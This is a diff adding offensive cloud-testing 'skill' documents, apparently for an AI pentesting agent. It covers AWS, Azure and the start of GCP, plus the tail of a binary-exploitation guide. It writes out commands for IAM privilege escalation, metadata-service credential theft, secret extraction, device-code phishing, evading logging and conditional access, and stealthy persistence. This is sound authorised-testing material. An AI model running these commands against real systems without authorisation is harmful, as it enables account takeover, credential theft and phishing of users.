+## Impact
+
+- Remote or local code execution when a memory-corruption bug yields instruction-pointer control on a network-facing or setuid binary
+- Local privilege escalation via setuid-root, capability-bearing, or SYSTEM-context binaries
+- Information disclosure of memory contents (canaries, pointers, adjacent secrets) enabling further exploitation
+- Command execution as the binary's user through `system`/`exec` injection
+- Credential and key compromise from hardcoded secrets recoverable by anyone with the binary
+- Supply-chain exposure when bundled libraries carry unpatched CVEs that the host application inherits
+
+## Pro Tips
+
+1. Run `checksec` before anything else - Full RELRO + PIE + canary + NX changes the entire exploitation strategy and tells you which bug classes are even worth chasing
+2. Disable ASLR for local triage (`setarch -R ./target` or `echo 0 > /proc/sys/kernel/randomize_va_space`) to get stable addresses while reproducing, then re-enable to assess the real bug
+3. A leak is worth more than a write early on - one libc/`.text` address unlocks ROP, ret2libc, and GOT targeting against an otherwise-randomized process
+4. Stripped binaries: let radare2/Ghidra auto-name, then pivot off import calls and string xrefs - the `system`/`strcpy`/`recv` callers are your map
+5. Always compile or run with ASan/UBSan when source is available - it turns silent corruption into a precise diagnostic and slashes fuzzing triage time
+6. Seed AFL++ with real valid inputs and enable `cmplog`/dictionaries for format-aware targets; minimize crashes with `afl-tmin` before debugging
+7. `one_gadget` against the target's libc often collapses a GOT/`__free_hook` overwrite into a single-address `execve("/bin/sh")` - check constraints before relying on it
+8. On Windows, check for DLL search-order and unquoted-service-path hijacks (`sc qc <svc>`, missing-DLL probes under Process Monitor) - often easier than memory corruption
+9. Match the exact libc (`libc-database` via leaked symbol offsets) before computing addresses; an off-by-one libc version silently breaks every gadget offset
+
+## Summary
+
+Native-binary findings chain from triage to control: file/format identification and protection enumeration scope what is exploitable, disassembly locates where untrusted input meets an unsafe sink, fuzzing turns that path into a reproducible crash, and debugger analysis classifies the crash as RIP control, a controlled write, or an info leak. Mitigations are the hinge - a stack overflow under Full RELRO + PIE + canary may need a leak plus a ROP chain, while the same bug on a no-canary, no-PIE binary is direct return-address control. Validate by proving the primitive (offset to saved return, leaked address, controllable `%p`) with benign observables, never a weaponized payload, and weight severity by the binary's privilege and network exposure.

--- a/strix/skills/cloud/aws.md
+++ b/strix/skills/cloud/aws.md
@@ -1,0 +1,242 @@
+---
+name: aws
+description: AWS cloud security testing - IAM privilege escalation, S3 exposure, IMDS SSRF credential theft, secrets extraction, Lambda/RDS/Cognito misconfigurations, and cross-account pivoting
+---
+
+# AWS Security Testing
+
+AWS environments break primarily through identity: over-permissive IAM policies, leaked credentials, and assumable role chains that let a low-privileged principal walk to administrator. The control plane is a single API surface (`https://<service>.<region>.amazonaws.com`) authenticated by SigV4, so every misconfiguration is reachable from anywhere with valid credentials. The most common initial access is a leaked long-lived access key or an SSRF that reads instance-profile credentials from the metadata service. This skill covers testing from the perspective of holding (or stealing) AWS credentials. For the SSRF that delivers instance credentials, see the ssrf skill.
+
+## Attack Surface
+
+**Scope**
+- IAM (users, groups, roles, policies, instance profiles) and STS (temporary credential issuance, `AssumeRole`)
+- S3 buckets (object ACLs, bucket policies, ACLs, presigned URLs, static website hosting)
+- EC2 (instances, AMIs, EBS snapshots, security groups, user-data, instance profiles)
+- Lambda (function code, environment variables, execution roles, resource policies)
+- Secrets Manager and SSM Parameter Store (`SecureString` parameters, secret values)
+- Cognito (user pools, identity pools, unauthenticated identity grants)
+- RDS / Aurora (instances, manual and automated snapshots, snapshot sharing)
+- API Gateway (REST/HTTP APIs, authorizers, stage variables, resource policies)
+- CloudTrail (logging coverage, multi-region trails, data-event blind spots)
+
+**Entry Points**
+- Long-lived access keys leaked in git history, CI logs, mobile app bundles, public AMIs, or EBS/RDS snapshots
+- IMDS SSRF returning instance-profile credentials from a compromised EC2/ECS/EKS workload
+- Public or weakly-scoped S3 buckets, Lambda function URLs, and API Gateway endpoints
+- Cognito unauthenticated identity pools handing out usable AWS credentials to anonymous clients
+- Federated/SSO entry via misconfigured SAML/OIDC trust policies on roles
+
+**Identity / Credential Types**
+- Long-lived IAM user keys (`AKIA...` prefix, paired with a secret key)
+- Temporary STS credentials (`ASIA...` prefix, include a session token, time-limited)
+- Instance-profile credentials delivered via IMDS (`http://169.254.169.254/...`), auto-rotated
+- Federated credentials from `AssumeRoleWithSAML` / `AssumeRoleWithWebIdentity` (SSO, Cognito, GitHub OIDC)
+
+## Key Vulnerabilities
+
+### IAM Privilege Escalation Paths
+
+A principal with seemingly limited permissions often holds one of the known escalation primitives. The highest-value paths: `iam:CreatePolicyVersion` (set a new default version granting `*`), `iam:PassRole` plus a service that runs roles (`ec2:RunInstances`, `lambda:CreateFunction`, `glue:CreateDevEndpoint`), `iam:AttachUserPolicy` / `iam:PutUserPolicy` (attach `AdministratorAccess` to self), `iam:CreateAccessKey` on another user, and `sts:AssumeRole` chains into more privileged roles.
+
+**Test:**
+```
+aws sts get-caller-identity
+aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query Arn --output text | cut -d/ -f2)
+# CreatePolicyVersion escalation: make a self-granting version the default
+aws iam create-policy-version --policy-arn arn:aws:iam::<acct>:policy/<editable> \
+  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default
+# AttachUserPolicy escalation: grant self admin
+aws iam attach-user-policy --user-name <me> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+# PassRole + Lambda: run code as a privileged role
+aws lambda create-function --function-name pwn --runtime python3.12 --role arn:aws:iam::<acct>:role/<privileged> \
+  --handler index.handler --zip-file fileb://pwn.zip
+```
+
+### Over-Permissive Policies and Wildcards
+
+Inline and managed policies with `"Action": "*"`, `"Resource": "*"`, wildcarded service actions (`s3:*`, `iam:*`), or `NotAction`/`NotResource` inversions that unintentionally grant broad access. Trust policies with `"Principal": {"AWS": "*"}` allow any account to assume the role.
+
+**Test:**
+```
+aws iam get-account-authorization-details > auth.json
+# cloudsplaining flags privilege-escalation, data-exfiltration, and resource-exposure findings
+cloudsplaining scan --file auth.json
+# find role trust policies assumable by any principal
+aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS==`*`]].RoleName'
+```
+
+### Public / Misconfigured S3 Buckets
+
+Buckets exposed via bucket ACL (`AllUsers`/`AuthenticatedUsers` grants), permissive bucket policies, disabled Block Public Access, or object-level ACLs. Static-website buckets and presigned URLs (which embed `X-Amz-Signature` and remain valid until expiry, even for private objects) leak data.
+
+**Test:**
+```
+aws s3api get-bucket-acl --bucket <bucket>
+aws s3api get-bucket-policy --bucket <bucket>
+aws s3api get-public-access-block --bucket <bucket>
+# unauthenticated listing/read attempts
+aws s3 ls s3://<bucket> --no-sign-request
+curl -s https://<bucket>.s3.amazonaws.com/
+# generate a presigned URL to a private object you can read
+aws s3 presign s3://<bucket>/secret.txt --expires-in 3600
+```
+
+### IMDS SSRF to Instance Credentials
+
+An SSRF on an EC2/ECS/EKS host reaching `169.254.169.254` yields the instance-profile role's temporary credentials. IMDSv1 (default on older instances) needs only a `GET`; IMDSv2 requires first obtaining a session token via `PUT` and sending it in `X-aws-ec2-metadata-token`. SSRFs that cannot send custom headers or `PUT` are blocked by IMDSv2 enforcement.
+
+**Test:**
+```
+# IMDSv1 (no token required)
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
+# IMDSv2 PUT-token flow
+TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
+  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
+  http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
+# ECS task role variant
+curl -s http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
+```
+
+### Leaked Access Keys
+
+Credentials committed to git, baked into AMIs/snapshots, embedded in Lambda env vars, or written to EC2 user-data. Any `AKIA`/`ASIA` string plus a 40-char secret is a candidate. EC2 user-data and AMI/snapshot contents are frequently overlooked stores.
+
+**Test:**
+```
+# scan a repo (filesystem or remote) for verified secrets
+trufflehog git file://. --only-verified
+trufflehog filesystem /mnt/extracted-ami --only-verified
+# user-data often contains bootstrap credentials
+aws ec2 describe-instance-attribute --instance-id <id> --attribute userData \
+  --query 'UserData.Value' --output text | base64 -d
+# validate any found key
+AWS_ACCESS_KEY_ID=<k> AWS_SECRET_ACCESS_KEY=<s> aws sts get-caller-identity
+```
+
+### Secrets Manager / SSM Parameter Store Extraction
+
+Principals with `secretsmanager:GetSecretValue` or `ssm:GetParameter*` can read stored credentials, often broader than intended via wildcard resources. `SecureString` SSM parameters decrypt transparently with `--with-decryption` when the caller can use the KMS key.
+
+**Test:**
+```
+aws secretsmanager list-secrets --query 'SecretList[].Name'
+aws secretsmanager get-secret-value --secret-id <name> --query SecretString --output text
+aws ssm describe-parameters --query 'Parameters[].Name'
+aws ssm get-parameters-by-path --path / --recursive --with-decryption \
+  --query 'Parameters[].[Name,Value]' --output text
+```
+
+### Lambda Env-Var Secrets and Overprivileged Execution Roles
+
+Lambda environment variables routinely hold DB passwords and API keys in plaintext (readable with `lambda:GetFunctionConfiguration`). The function's execution role is frequently over-scoped; combined with `PassRole`, attackers run code as that role.
+
+**Test:**
+```
+aws lambda list-functions --query 'Functions[].[FunctionName,Role]' --output text
+aws lambda get-function-configuration --function-name <fn> --query Environment.Variables
+# download the deployment package to inspect for hardcoded secrets
+aws lambda get-function --function-name <fn> --query Code.Location --output text
+# inspect the execution role's permissions
+aws iam list-attached-role-policies --role-name <exec-role>
+```
+
+### Public RDS Snapshots
+
+Manual RDS/Aurora snapshots shared with `all` (public) or shared to an attacker-controlled account can be restored into the attacker's account, exposing the full database. Public snapshots are discoverable account-wide.
+
+**Test:**
+```
+aws rds describe-db-snapshots --snapshot-type public --query 'DBSnapshots[].DBSnapshotIdentifier'
+aws rds describe-db-snapshot-attributes --db-snapshot-identifier <snap> \
+  --query 'DBSnapshotAttributesResult.DBSnapshotAttributes'
+# restore a shared/public snapshot into your own account, then connect
+aws rds restore-db-instance-from-db-snapshot --db-instance-identifier loot \
+  --db-snapshot-identifier <snap>
+```
+
+### Cognito Misconfiguration
+
+Unauthenticated identity pools hand AWS credentials to anonymous clients; the attached role's permissions then become anyone's. User pools with open self-signup allow attribute injection (setting `email_verified`, custom attributes, or `is_admin`-style claims the app trusts).
+
+**Test:**
+```
+# anonymous credentials from an unauth identity pool
+aws cognito-identity get-id --identity-pool-id <region>:<pool-id>
+aws cognito-identity get-credentials-for-identity --identity-id <id>
+# self-register with injected attributes (open signup)
+aws cognito-idp sign-up --client-id <app-client> --username attacker \
+  --password 'Pwn123!@#' --user-attributes Name=email,Value=a@b.c Name=custom:role,Value=admin
+```
+
+## Bypass Techniques
+
+**Enumerate without logging**
+- `enumerate-iam` brute-forces hundreds of read-only `List`/`Get`/`Describe` calls to map permissions when `iam:Get*` is denied; many calls are not logged as data events
+- Prefer read-only describe calls during recon; CloudTrail records management events but data-plane S3/Lambda reads are off by default
+
+**Cross-account assume-role**
+- Roles whose trust policy allows your account (or `*`) are assumable across the account boundary: `aws sts assume-role --role-arn arn:aws:iam::<other>:role/<r> --role-session-name x`
+- Chain roles: assumed creds may themselves hold `sts:AssumeRole` into deeper roles — repeat until you reach admin
+
+**CloudTrail blind spots**
+- S3 object-level and Lambda invoke events require data-event logging, usually disabled — read activity goes unrecorded
+- A single-region trail misses actions performed in other regions
+- Disrupting the trail (`cloudtrail:StopLogging`, `PutEventSelectors`) is itself logged, so prefer regions/services with no coverage
+
+**Region hopping**
+- Resources and trails are per-region; enumerate every region (`aws ec2 describe-regions`) because findings (snapshots, instances, secrets) hide in unused regions
+
+## Testing Methodology
+
+1. **Identify the principal** - `aws sts get-caller-identity` confirms account, user/role ARN, and whether creds are user (`AKIA`) or temporary (`ASIA`)
+2. **Enumerate permissions** - `enumerate-iam` for brute-force mapping; `aws iam get-account-authorization-details` + `cloudsplaining` when you have IAM read
+3. **Broad posture scan** - run `prowler aws` and `scout suite aws` for a full misconfiguration baseline across services
+4. **Hunt privilege escalation** - run `pacu` and use its `iam__privesc_scan` module to detect known escalation paths automatically
+5. **Find priv-esc primitive** - confirm one of: `CreatePolicyVersion`, `PassRole`+service, `AttachUserPolicy`, `CreateAccessKey`, assumable role
+6. **Pivot** - assume more privileged roles, restore shared snapshots, read secrets, escalate to `AdministratorAccess`
+7. **Map data stores** - enumerate S3, RDS snapshots, Secrets Manager, SSM, Lambda env vars across all regions
+
+## Validation
+
+1. Prove identity and access scope with `aws sts get-caller-identity` and a successful privileged read (non-destructive)
+2. For IAM escalation, demonstrate the new permission with a read-only call that previously returned `AccessDenied`, not by deleting/modifying production resources
+3. For S3, show object listing or a single benign object read (`aws s3 cp s3://<bucket>/<key> -`), not bulk download
+4. For IMDS, retrieve and `get-caller-identity` with the instance-profile creds to confirm they are live and what role they grant
+5. For assume-role chains, run `get-caller-identity` after each `assume-role` to prove the new principal
+6. For snapshots, confirm the snapshot is shared/public via `describe-*-snapshot-attributes` without restoring production data
+
+## False Positives
+
+- `s3 ls --no-sign-request` succeeding on a bucket that intentionally hosts public static content (CDN origin)
+- A role with `Principal: *` in its trust policy but a `Condition` (`sts:ExternalId`, `aws:PrincipalOrgID`, source-account) that actually restricts assumption
+- Access keys found in code that are already deactivated/rotated - always validate with `get-caller-identity`
+- `prowler`/`ScoutSuite` flagging public-block disabled on a bucket whose object ACLs and policy still deny public read
+- Cognito unauth pool whose attached role has an empty or deny-all policy - credentials issue but grant nothing
+
+## Impact
+
+- Full account takeover via IAM privilege escalation to `AdministratorAccess`
+- Cross-account compromise through over-trusting role policies and assume-role chains
+- Bulk data exfiltration from public S3 buckets, restorable RDS snapshots, and readable secrets
+- Persistent backdoor access via new IAM users/keys, role trust modifications, or Lambda backdoors
+- Lateral movement from a single compromised workload (IMDS creds) into the broader account
+- Compute abuse (cryptomining) and resource destruction using escalated privileges
+
+## Pro Tips
+
+1. `ASIA` keys are temporary - they need the session token and expire; capture all three values and check `aws sts get-caller-identity` before relying on them
+2. Run `enumerate-iam` first when `iam:Get*` is denied - it maps your real permissions without needing IAM read access
+3. Pacu's `iam__privesc_scan` automates the 20+ known escalation paths; it finds primitives faster than manual policy review
+4. Always enumerate every region - snapshots, secrets, and forgotten instances hide in regions the team never uses
+5. IMDSv2 requires the `PUT`-then-header token flow; an SSRF limited to plain `GET` is blocked, so check the metadata options (`HttpTokens: required`) before assuming the host is exploitable
+6. Presigned S3 URLs work for private objects and survive even after the bucket is locked down - they expire only on their own timer
+7. `PassRole` is the linchpin of most escalation - audit which services you can pass roles to (`ec2`, `lambda`, `glue`, `cloudformation`, `sagemaker`) and which roles are passable
+8. Lambda env vars and EC2 user-data are the two most reliable plaintext secret stores - check both before deeper digging
+9. Prefer read-only `Describe`/`List`/`Get` calls during recon; data-event logging is usually off, so S3 reads stay invisible while management calls are recorded
+
+## Summary
+
+AWS compromise chains through identity: leaked keys or IMDS SSRF deliver an initial principal, permission enumeration (`enumerate-iam`, `cloudsplaining`, Pacu) reveals an escalation primitive (`CreatePolicyVersion`, `PassRole`+service, `AttachUserPolicy`, or an assumable role), and that primitive walks to administrator or pivots across accounts. Data stores - S3, RDS snapshots, Secrets Manager, SSM, Lambda env vars - are the loot, and CloudTrail's data-event blind spots keep much of the read activity invisible. Test the chain from caller identity to escalation to pivot, not isolated findings, and validate every credential with `get-caller-identity` before trusting it.

--- a/strix/skills/cloud/azure.md
+++ b/strix/skills/cloud/azure.md
@@ -1,0 +1,211 @@
+---
+name: azure
+description: Microsoft Azure and Entra ID security testing - managed identity IMDS abuse, service principal and app registration takeover, RBAC escalation, Storage/Key Vault exposure, and device-code phishing
+---
+
+# Azure Security Testing
+
+Azure couples two distinct trust planes: the Entra ID (formerly Azure AD) identity plane that issues OAuth tokens for Microsoft Graph and ARM, and the Azure Resource Manager control plane that governs subscriptions, resource groups, and resources through RBAC. The seam between them is where most compromises live - an over-permissioned service principal, a managed identity reachable through SSRF, or an anonymous Storage container leaks credentials that the other plane trusts implicitly. Tokens are bearer tokens scoped per-resource (`https://graph.microsoft.com`, `https://management.azure.com`, `https://vault.azure.net`), so capturing one token rarely grants everything; capturing the right one grants the subscription. For SSRF-mediated managed identity token theft, see the ssrf skill.
+
+## Attack Surface
+
+**Scope**
+- Entra ID tenant (users, groups, service principals, app registrations, conditional access)
+- Azure Resource Manager (`management.azure.com`) - subscriptions, resource groups, RBAC assignments
+- Instance Metadata Service (IMDS) at `169.254.169.254` reachable from any VM/container
+- Storage accounts (Blob, File, Queue, Table) with public endpoints and SAS tokens
+- Key Vault (`*.vault.azure.net`) holding secrets, keys, and certificates
+- Automation Accounts, Function Apps, Logic Apps, and their managed identities
+- Microsoft Graph (`graph.microsoft.com`) for directory and mailbox operations
+
+**Entry Points**
+- Compromised VM/container with a system- or user-assigned managed identity
+- Leaked service principal credentials (client ID + secret/cert) in code, pipelines, or `.env`
+- Anonymous or SAS-token-exposed Storage blobs containing connection strings
+- Device-code phishing yielding a refresh token for a real user
+- CI/CD federated credentials (GitHub OIDC, Azure DevOps service connections)
+
+**Authentication and identity**
+- Bearer tokens are audience-scoped JWTs; decode the `aud`, `scp`/`roles`, and `oid` claims to know what a token can do (see authentication_jwt)
+- Managed identities never expose a secret - the VM trades its identity for a token at IMDS
+- Service principals authenticate with a client secret, certificate, or federated credential
+- Refresh tokens from interactive/device-code flows mint access tokens for any resource the user consented to (Family of Client IDs token exchange widens this further)
+
+## Key Vulnerabilities
+
+### Managed Identity via IMDS
+
+Any process on an Azure VM or App Service instance can request an OAuth token for the attached managed identity from the non-routable IMDS endpoint. The request requires the `Metadata: true` header (anti-SSRF guard that browsers cannot set) and a `resource=` parameter naming the target audience. A token for `https://management.azure.com/` plus a permissive role assignment is full subscription control. This is the single highest-yield primitive when chained from SSRF.
+
+**Test:**
+```
+# System-assigned identity, ARM-scoped token
+curl -s -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
+# Graph and Key Vault audiences
+curl -s -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
+curl -s -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"
+# User-assigned identity: pin the client_id
+curl -s -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<uami-client-id>"
+```
+
+### Service Principals and App Registrations
+
+Service principals are the non-human identities Azure trusts most. An attacker who can add credentials to an existing app registration (`Application.ReadWrite.All` or ownership) gains that app's effective permissions; apps holding Graph application permissions like `RoleManagement.ReadWrite.Directory` or `AppRoleAssignment.ReadWrite.All` are a direct path to Global Admin.
+
+**Test:**
+```
+# Enumerate SPs, app registrations, and their API permissions
+az ad sp list --all -o json | jq '.[] | {appId, displayName}'
+az ad app list --all -o json | jq '.[] | {appId, displayName, requiredResourceAccess}'
+# Add a new client secret to an app you own/control (persistence + reuse)
+az ad app credential reset --id <appId> --append
+# ROADrecon full directory dump for offline analysis
+roadrecon auth -u user@tenant.onmicrosoft.com -p '<pass>'
+roadrecon gather && roadrecon gui
+```
+
+### RBAC Privilege Escalation
+
+Azure RBAC escalation hinges on roles that can grant roles or run code as a privileged identity. `Microsoft.Authorization/roleAssignments/write` (held by Owner and User Access Administrator) lets a principal assign itself Owner. `Microsoft.Compute/virtualMachines/runCommand/action` runs arbitrary commands as SYSTEM/root on a VM, inheriting that VM's managed identity.
+
+**Test:**
+```
+# Current principal's effective assignments
+az role assignment list --assignee <oid> --all -o table
+# Hunt for assignment-write and runCommand rights across roles
+az role definition list -o json | jq '.[] | select(.permissions[].actions[] | test("roleAssignments/write|runCommand|Microsoft.Authorization/.*/write")) | .roleName'
+# Run code as the VM identity (then re-query IMDS)
+az vm run-command invoke -g <rg> -n <vm> --command-id RunShellScript \
+  --scripts "curl -s -H 'Metadata:true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'"
+# AzureHound collects RBAC + Entra graph for BloodHound
+azurehound -u user@tenant -p '<pass>' list --tenant <tenantId> -o azurehound.json
+```
+
+### Storage Account Exposure
+
+Blob containers set to `Blob` or `Container` public access level are readable without authentication; `Container` level additionally allows anonymous listing. SAS tokens (signed query strings) leak in URLs, logs, and client code, often with `sp=racwdl` (full) permissions and multi-year expiry. Connection strings in blobs expose the account key, which signs unlimited SAS tokens.
+
+**Test:**
+```
+# Anonymous list/read against a guessed account+container
+curl -s "https://<account>.blob.core.windows.net/<container>?restype=container&comp=list"
+curl -s "https://<account>.blob.core.windows.net/<container>/<blob>"
+# Enumerate account/container names (MicroBurst)
+Import-Module .\MicroBurst.psm1; Invoke-EnumerateAzureBlobs -Base <orgname>
+# Inspect a leaked SAS token's permissions/expiry from its query params (sp, se, sig)
+az storage blob list --account-name <account> --container-name <c> --sas-token "<sas>" -o table
+```
+
+### Key Vault Secret Extraction
+
+A token with the `https://vault.azure.net` audience plus a Key Vault access policy or the RBAC `Key Vault Secrets User` role reads every secret in the vault. Managed identities are routinely granted vault access, so an IMDS token frequently unlocks database passwords, API keys, and certificate private keys.
+
+**Test:**
+```
+# Using a vault-scoped token from IMDS
+VTOK=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)
+curl -s -H "Authorization: Bearer $VTOK" "https://<vault>.vault.azure.net/secrets?api-version=7.4"
+curl -s -H "Authorization: Bearer $VTOK" "https://<vault>.vault.azure.net/secrets/<name>?api-version=7.4"
+# Or via CLI when already authenticated
+az keyvault secret list --vault-name <vault> -o table
+az keyvault secret show --vault-name <vault> --name <name> --query value -o tsv
+```
+
+### Device-Code Phishing
+
+The OAuth device-code flow lets an attacker initiate authentication for a first-party client (e.g. Azure CLI app ID `04b07795-8ddb-461a-bbee-02f9e1bf7b46`), send the victim the short `user_code`, and poll for the resulting tokens. No password crosses the attacker, MFA is satisfied by the victim, and the returned refresh token mints tokens for Graph, ARM, and Office.
+
+**Test:**
+```
+# Initiate device-code flow against a first-party client
+curl -s -X POST "https://login.microsoftonline.com/<tenant>/oauth2/v2.0/devicecode" \
+  -d "client_id=04b07795-8ddb-461a-bbee-02f9e1bf7b46&scope=https://graph.microsoft.com/.default offline_access"
+# Poll for the token after the victim enters the user_code at microsoft.com/devicelogin
+curl -s -X POST "https://login.microsoftonline.com/<tenant>/oauth2/v2.0/token" \
+  -d "grant_type=urn:ietf:params:oauth:grant-type:device_code&client_id=04b07795-8ddb-461a-bbee-02f9e1bf7b46&device_code=<code>"
+```
+
+### Automation Account Runbooks
+
+Automation Accounts execute PowerShell/Python runbooks under a Run As account or system-assigned managed identity, frequently scoped Contributor or Owner over the subscription. Permission to create or edit a runbook is arbitrary code execution as that high-privilege identity.
+
+**Test:**
+```
+az automation account list -o table
+az automation runbook list --automation-account-name <aa> -g <rg> -o table
+# MicroBurst extracts Run As certs and runbook contents
+Import-Module .\MicroBurst.psm1; Get-AzPasswords -Verbose
+```
+
+## Bypass Techniques
+
+**Conditional Access evasion**
+- Device-code and ROPC flows often escape CA policies that only target browser/SAML logins
+- Spoof a compliant user-agent or trusted-network IP; legacy auth endpoints may skip MFA entirely
+- Family-of-Client-IDs (FOCI) refresh tokens exchange one app's token for another's, sidestepping per-app consent
+
+**Token audience pivoting**
+- A refresh token mints access tokens for any resource the principal can reach - swap `resource=`/`scope=` to jump from Graph to ARM to Key Vault
+- ARM tokens validate the audience, not the issuing flow, so an IMDS token is indistinguishable from an interactive one
+
+**Stealthy persistence**
+- Add a secondary client secret or certificate to an existing app registration rather than creating a new app
+- Register attacker-controlled credentials as a federated identity credential (no secret to rotate)
+- Consent-grant a malicious multi-tenant app to a user to retain Graph access after password reset
+
+## Testing Methodology
+
+1. **Identify the identity** - decode any captured token (`aud`, `scp`, `roles`, `oid`, `tid`); run `az account show` if a CLI context exists
+2. **Pull IMDS** - on any compromised compute, request ARM, Graph, and Vault tokens from `169.254.169.254`
+3. **Enumerate the directory** - ROADrecon/AzureHound dump users, SPs, app permissions, and role-eligible members
+4. **Map RBAC** - list role assignments and definitions; flag `roleAssignments/write`, `runCommand`, and `*/write` on Authorization
+5. **Sweep storage** - MicroBurst blob enumeration; test anonymous container listing and inspect leaked SAS scopes
+6. **Raid Key Vault** - use vault-audience tokens to list and read secrets, keys, and certificates
+7. **Hunt code execution** - VM runCommand, Automation runbooks, Function App deployment as managed identities
+8. **Escalate and persist** - chain SP credential addition, role self-assignment, or app consent for durable access
+9. **Graph the attack path** - load AzureHound output into BloodHound to find the shortest path to Global Admin/Owner
+
+## Validation
+
+1. Decode the captured token and confirm its `aud` and `roles`/`scp` claims match the access you intend to claim
+2. Make one read-only authenticated call (`az account show`, Graph `/me`, vault secret list) to prove the token is live
+3. For RBAC escalation, show the role definition contains the dangerous action - do not actually assign the role in production
+4. For storage, show anonymous read returning real content, or decode the SAS query string (`sp`, `se`) to prove its scope
+5. For runCommand/runbook RCE, return a benign command's output (`whoami`, identity token) rather than altering state
+
+## False Positives
+
+- IMDS reachable but returning `400`/`404` - no managed identity is assigned to the instance
+- A token obtained but its `roles`/`scp` claims are empty or read-only, granting nothing actionable
+- Storage container marked public but containing only static web assets intended to be public
+- SAS token present but already expired (`se` in the past) or scoped read-only to a single innocuous blob
+- Service principal with many API permissions that are all delegated (require a signed-in user) rather than application permissions
+
+## Impact
+
+- Full subscription takeover via managed identity + permissive RBAC or self-assigned Owner
+- Tenant compromise (Global Admin) through app registrations holding privileged Graph permissions
+- Credential and secret theft from Key Vault, Storage connection strings, and Automation Run As accounts
+- Persistent backdoor access via added SP credentials, federated identities, or malicious app consent
+- Lateral movement across subscriptions and into hybrid/on-prem via Entra Connect and seamless SSO
+- Mass data exfiltration from anonymously exposed or SAS-leaked Storage accounts
+
+## Pro Tips
+
+1. Always decode the token before acting - the `aud` claim tells you which API it works against and avoids wasted, noisy calls
+2. One IMDS token per audience: request ARM, Graph, and Vault separately; a single resource won't cover all three
+3. `Microsoft.Compute/.../runCommand/action` is the cleanest pivot from ARM rights to OS-level code under the VM's identity
+4. Refresh tokens are the prize in device-code phishing - they outlive access tokens and mint new audiences on demand
+5. Run AzureHound + BloodHound early; the shortest-path query surfaces escalation chains that manual RBAC review misses
+6. Storage account names are globally unique and guessable - brute the `<org>blob/storage/backup` namespace before assuming nothing is exposed
+7. Application permissions (`roles` claim) are far more dangerous than delegated ones (`scp` claim) because they need no signed-in user
+8. Stormspotter and ROADrecon visualize the same data differently - ROADrecon excels at app/SP permission auditing offline
+9. Check `az account list` for multiple subscriptions; a low-priv identity in one may be Owner in a forgotten dev subscription
+
+## Summary
+
+Azure compromises chain across its two trust planes: an IMDS-reachable managed identity or a leaked service principal yields a bearer token, the token's audience and role claims decide whether it touches ARM, Graph, or Key Vault, and one privileged claim (role-assignment write, runCommand, or a directory-write Graph permission) converts that foothold into subscription or tenant ownership. Decode tokens first, enumerate identity and RBAC with ROADtools/AzureHound, raid Storage and Key Vault for secondary credentials, and graph the path to Global Admin rather than chasing isolated findings. Persistence is cheap - a second app secret or a malicious consent grant survives the obvious remediations.

--- a/strix/skills/cloud/gcp.md
+++ b/strix/skills/cloud/gcp.md
@@ -1,0 +1,203 @@
+---
+name: gcp
+description: Google Cloud Platform security testing - service account impersonation, IAM privilege escalation, metadata server token theft, GCS bucket misconfiguration, and compute/function abuse
+---
+
+# GCP Security Testing
+
+Google Cloud's security model is dominated by service accounts and the IAM permissions that let one identity act as another. Almost every privilege escalation path on GCP is a permission that grants control over a service account - the ability to mint its tokens, deploy code that runs as it, or attach it to a new resource. The metadata server on every Compute Engine, GKE, and Cloud Run instance hands out OAuth access tokens for the attached service account to any local process, making it the fastest pivot from code execution to cloud credentials. Tokens are OAuth2 bearer tokens constrained by both IAM permissions and OAuth scopes, so a token is only as powerful as the intersection of the two. For SSRF-mediated metadata token theft, see the ssrf skill.
+
+## Attack Surface
+
+**Scope**
+- Cloud IAM (project, folder, organization bindings; service accounts and their keys)
+- Metadata server at `metadata.google.internal` / `169.254.169.254` on every instance
+- Cloud Storage (GCS) buckets and objects with IAM and legacy ACLs
+- Compute Engine (GCE) instances, custom images, startup scripts
+- Cloud Functions and Cloud Run services and their runtime service accounts
+- Deployment Manager, Cloud Build, and other deploy-as-SA services
+- OAuth scopes attached to instances that cap what an SA token can do
+
+**Entry Points**
+- Compromised GCE/GKE/Cloud Run workload with an attached service account
+- Leaked service account key JSON in repos, CI configs, container images, or buckets
+- Publicly readable/writable GCS buckets (`allUsers`, `allAuthenticatedUsers`)
+- An identity with a single dangerous IAM permission on a more-privileged SA
+- Cloud Build / CI federation (Workload Identity Federation, GitHub OIDC)
+
+**Authentication and identity**
+- Service account tokens are short-lived OAuth2 access tokens fetched from the metadata server or minted via the IAM Credentials API
+- Service account keys are long-lived JSON files (private key + client_email) usable from anywhere
+- Access scopes are an instance-level legacy control that intersects with IAM; a scope-limited token cannot exceed its scopes even with broad IAM
+- `gcloud auth print-access-token` and `gcloud config list` reveal the active identity and its token
+
+## Key Vulnerabilities
+
+### Metadata Server Token Theft
+
+Every Google Cloud instance exposes a metadata server that returns an OAuth access token for the attached service account to any process that asks. The request must carry the `Metadata-Flavor: Google` header (which browsers and most SSRF gadgets cannot forge) and targets the `default` (or a named) service account. The token inherits the instance's access scopes; a `cloud-platform`-scoped instance yields a token good for the entire API surface.
+
+**Test:**
+```
+# Service account access token (note the required header)
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
